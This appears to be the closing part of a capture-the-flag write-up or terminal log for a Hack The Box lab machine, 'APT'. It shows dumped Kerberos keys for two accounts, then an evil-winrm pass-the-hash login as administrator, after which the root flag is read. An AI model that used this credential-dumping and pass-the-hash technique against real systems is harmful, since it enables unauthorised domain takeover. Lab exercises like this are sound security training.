henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

getroot

└─$ evil-winrm -u administrator -H c370bddf384a691d811ff3495e8a72e2 -i apt.htb.local         
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/r*
4e7e8f8add328d0df0f09cd7f08b8d36

下班